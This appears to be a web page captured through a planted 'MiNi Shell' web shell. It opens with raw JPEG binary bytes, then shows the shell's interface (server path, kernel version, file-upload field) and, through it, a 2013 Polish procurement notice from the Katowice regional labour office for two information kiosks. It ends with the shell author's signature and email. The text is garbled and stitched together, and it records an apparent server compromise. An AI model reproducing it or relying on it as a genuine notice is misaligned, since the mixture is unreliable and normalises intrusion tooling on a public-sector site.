JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131025/224881-N-2013.html

<p class="kh_header"><b>Katowice: DOSTAWA  INFOKIOSKÓW  DO  PUNKTU  INFORMACYJNEGO  EFS  WOJEWODZKIEGO  URZĘDUPRACY  W  KATOWICACH</b><br>
<b>Numer ogłoszenia: 224881 - 2013; data zamieszczenia: 25.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu woj.śląskiego nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA  INFOKIOSKÓW  DO  PUNKTU  INFORMACYJNEGO  EFS  WOJEWODZKIEGO  URZĘDUPRACY  W  KATOWICACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa dwóch infokiosków do Punktu Informacyjnego EFS Wojewódzkiego Urzędu Pracy w Katowicach wraz z oprogramowaniem.
Szczegółowy opis przedmiotu zamówienia:
Infokiosk przeznaczony do instalacji w pomieszczeniach zamkniętych. Z infokiosku korzystać będą głównie klienci bez nadzoru pracowników - z tego powodu urządzenie powinno posiadać podstawową odporność przed aktami wandalizmu (próby przewrócenia, nieautoryzowanego dostępu do wnętrza infokiosku). Infokioski mają stanowić wyposażenie Punktu Informacyjnego EFS w WUP w Katowicach i pomóc klientom Punktu w sprawnym przeszukiwaniu ofert szkoleniowych współfinansowanych z EFS dostępnych na stronie internetowej WUP poświęconej Europejskiemu Funduszowi Społecznemu. Obecnie jest to strona http:efs.wup-katowice.pl. 
Klient Punktu Informacyjnego korzystający z infokiosku ma mieć możliwość wejścia na wyżej wymienioną stronę i wydruku konkretnej oferty szkoleniowej lub opisu konkretnego projektu, które dostępne są obecnie w zakładkach Wsparcie EFS oraz Środki na otwarcie działalności gospodarczej. Oprogramowanie infokiosku powinno umożliwiać wydruk jedynie treści wskazanych przez WUP. Ponadto infokiosk ma również udostępniać informacje o projektach EFS zamieszczonych na stronie www.inwestycjawkadry.pl oraz Mapa projektów EFS www.projekty.efs.gov.pl. 
Ponadto w związku z planowanym wejściem w życie nowej perspektywy finansowej na lata 2014 - 2020 może dojść do zmiany adresu strony internetowej WUP w Katowicach dotyczącej EFS oraz zmiany adresów stron ogólnopolskich zawierających wyszukiwarki projektów współfinansowanych ze środków EFS. W związku z powyższym zamawiane infokioski, a dokładnie ich oprogramowanie, powinno umożliwiać zmianę adresów wyświetlanych stron internetowych oraz treści przeznaczonych do wydruku. 
Istotną cechą zamawianego sprzętu jest możliwość jego swobodnego użytkowania przez osoby poruszające się na wózkach inwalidzkich.
Parametry techniczne:
A)  Obudowa infokiosku
- Wysokość infokiosku umożliwiająca korzystanie z urządzenia przez osoby poruszające się 
na wózkach inwalidzkich.
- Wykonanie obudowy infokiosku musi zapewniać stabilność i odporność konstrukcji podczas normalnego korzystania z infokiosku.
- Konstrukcja infokiosku wykonana w sposób zabezpieczający przed dostępem do wnętrza osób nieupoważnionych z jednoczesnym zapewnieniem łatwego dostępu serwisowego (zamek). 
- Konstrukcja infokiosku powinna zabezpieczać urządzenie przed łatwym przewróceniem - np. poprzez instalację dodatkowego obciążenia w podstawie.
- Obudowa infokiosku musi być trwale oznakowana (nie dopuszcza się naklejek) obowiązującymi logotypami umieszczonymi na jednej tablicy, która ma być zdublowana (miejsce umieszczenia oznakowania - przód oraz plecy infokiosku), o wielkości proporcjonalnej do dostępnego miejsca na obudowie, tak aby zachować czytelność znaku i jego widoczność z daleka:
-Programu Operacyjnego Kapitał Ludzki - Narodowej Strategii Spójności;
-Unii Europejskiej - Europejskiego Funduszu Społecznego;
-Województwa Śląskiego;
-Wojewódzkiego Urzędu Pracy w Katowicach;
-informacją o współfinansowaniu zakupu ze środków Europejskiego Funduszu Społecznego.
-  Projekt graficzny tabliczki informacyjnej zostanie przestawiony do akceptacji zamawiającego.
- Obudowa infokiosku uniemożliwiająca podłączenie pendrivów, dysków przenośnych USB, kart pamięci, itp. osobom korzystającym (petentom lub klientom) z infokiosku.

B) Ekran infokiosku o następujących parametrach:
-dotykowy;
-zabezpieczony szybą odporną na zadrapania, porysowania, potłuczenia i inne akty wandalizmu;
-wielkość ekranu: min. 19 cali;
-format obrazu (proporcje): 5:4;
-typ matrycy: VA, PVA, MVA, IPS (nie dopuszcza się stosowania matryc typu TN);
-rozdzielczość natywna: min. 1280 x 1024;
-kąty widzenia umożliwiające bezproblemowe czytanie z matrycy osobom o różnym wzroście i poruszających się na wózkach inwalidzkich.

C)  Urządzenia wskazujące:
-metalowa klawiatura wandaloodporna z trackballem lub touchpadem;
-układ klawiszy klawiatury - standardowy.

D)   Parametry jednostki centralnej:
-klasy x86 obsługujący instrukcje 32 i 64 bitowe o ogólnej wydajności nie gorszej niż 1469 pkt według testu Passmark;
-wielkość zainstalowanej pamięci: min. 4GB;
-zintegrowana karta graficzna;
-zintegrowana karta dźwiękowa;
-zintegrowana karta sieciowa: Intel lub Broadcom;
-typ zintegrowanej karty sieciowej: 10,100,1000 Mbit,s;
-pojemność zainstalowanego dysku twardego: min. 250GB.

E)   Oprogramowanie systemowe:
-System operacyjny: Microsoft Windows 7 Professional PL 64-bit z możliwością downgrade 
do Windows XP.

F)  Oprogramowanie zarządzająco-sterujące:
-Zabezpieczenie systemu przed nieuprawnioną ingerencją użytkownika (klienta lub petenta), umożliwienie filtrowania dostępu do internetu, monitorowanie pracy infokiosku, generowanie statystyki użytkowania infokiosku.
-Moduły aplikacji infokiosku zawierające minimum następujące elementy:
-przeglądarka internetowa z funkcją białej listy stron internetowych;
-wirtualna, skalowalna klawiatura;
-strona startowa z przyciskami (z możliwością edycji);
-moduł do tworzenia kategorii (kolejnych ekranów z przyciskami);
-przeglądarka dokumentów (PDF, Word, Excel) umożliwiająca wyświetlanie lokalnie zainstalowanych dokumentów;
-moduły umożliwiające wyświetlanie filmów (również z stron internetowych);
-moduł do wyświetlania ofert szkoleń i informacji o realizowanych projektach;
-wygaszacz ekranu;
-restart urządzenia w przypadku jego zawieszania;
-zabezpieczony hasłem program do konfiguracji;
-wyświetlanie menu umożliwiającego użytkownikowi wybór zaprogramowanych funkcji infokiosku multimedialnego, jak również wyświetlenie i przywołanie tego menu 
w dowolnym momencie funkcjonowania;
-oprogramowanie do zdalnego zarządzania infokioskiem z poziomu innego komputera 
w sieci, możliwość wykonania zdalnego resetowania lub wyłączenia infokiosku; możliwość zdalnej zmiany konfiguracji ,aktualizacji oprogramowania zarządzająco-sterującego.

G)  Urządzenie drukujące:
-Umieszczone wewnątrz infokiosku.
-echnologia druku: termiczna.
-Format obsługiwanych materiałów: A4 (dotyczy szerokości).
-Papier w rolce.
-Mechanizm automatycznego odcinania całej kartki wraz z jej przytrzymaniem w szczelinie
   odbiorczej.
-Dodatkowe wyposażenie: dziesięć rolek papieru.

H)  Zasilanie infokiosku:
-Przygotowane do zasilania z sieci elektrycznej 230V za pomocą pojedynczego przyłącza.
-Włącznik główny zasilania infokiosku dostępny wyłącznie dla obsługi, wewnątrz infokiosku.

I)   Dostawa infokiosków:
Wykonawca zapewnia:
-dostawę, instalację, uruchomienie  w miejscu wskazanym przez Zamawiającego (w siedzibie  Zamawiającego), tj. w Wojewódzkim Urzędzie Pracy w Katowicach;
-szkolenie w zakresie obsługi urządzenia i zainstalowanego oprogramowania dla siedmiu pracowników, zaplanowane na dzień roboczy (poniedziałek-piątek) między godz. 10:00 a 13:00;
-odbiór infokiosków będzie potwierdzony protokołem odbioru, którego sporządzenie leży po stronie Wykonawcy;
-protokół odbioru winien zawierać: a) opis urządzenia: ilość, nazwa i rodzaj, numery fabryczne i inne występujące oznakowania, b) miejsce i datę odbioru, c) oświadczenie pracowników, 
że dostarczone urządzenie nie posiada widocznych uszkodzeń, oraz że jest zgodne z opisem przedmiotu zamówienia, d) potwierdzenia odbycia szkolenia, o którym mowa powyżej;
-w przypadku stwierdzenia widocznych uszkodzeń Wykonawca wymieni urządzenie na nowe, 
na własny koszt bez dodatkowych opłat w terminie 5 dni;
-zobowiązania Wykonawcy będą uznane za wykonane z chwilą podpisania protokołu odbioru przedmiotu umowy bez zastrzeżeń.

J)   Gwarancja producenta i serwis:
-Oferowany sprzęt musi być fabrycznie nowy, objęty gwarancją producenta.
-Okres gwarancji wynosi minimum 36 miesięcy od daty instalacji obejmujący prawidłową pracę infokiosku.
-Realizacja naprawy w miejscu instalacji infokiosku po uprzednim zgłoszeniu telefonicznym, 
za pośrednictwem poczty elektronicznej e-mail lub faksu.
-Czas realizacji skutecznej naprawy maksymalnie 3 dni od daty zgłoszenia.
-Zapewnienie serwisu po okresie gwarancji przez okres minimum 2 lat.
-Aktualizacja oprogramowania sterującego musi być bezpłatna w okresie minimum 36 miesięcy.
-Wraz z urządzeniem Wykonawca zobowiązany jest przekazać kartę gwarancyjną w języku polskim, uwzględniającą postanowienia dotyczące gwarancji zawarte w SIWZ.
-W celu potwierdzenia, że oferowana dostawa odpowiada określonym wymaganiom, oferta musi zawierać szczegółową specyfikację techniczną (uwzględniającą parametry techniczne Zamawiającego wymienione w opisie przedmiotu zamówienia) oferowanego sprzętu (co najmniej nazwa producenta 
i model podzespołów). Specyfikacja techniczna winna być podpisana przez upoważnionego przedstawiciela Wykonawcy.
-Oświadczenie Wykonawcy gwarantujące, że oferowany sprzęt jest fabrycznie nowy i pochodzi z oficjalnego kanału sprzedaży producenta na rynek polski i objęty jest polską gwarancją producenta.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE PRZEWIDUJE  WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	Oświadczenie Wykonawcy gwarantujące, że oferowany sprzęt jest fabrycznie nowy i pochodzi z oficjalnego kanału sprzedaży producenta na rynek polski i objęty jest polską gwarancją  producenta - Załącznik Nr 6 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika 
z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 305, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2013 godzina 11:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 210- Kancelaria Urzędu, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup współfinansowany przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach Pomocy Technicznej Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com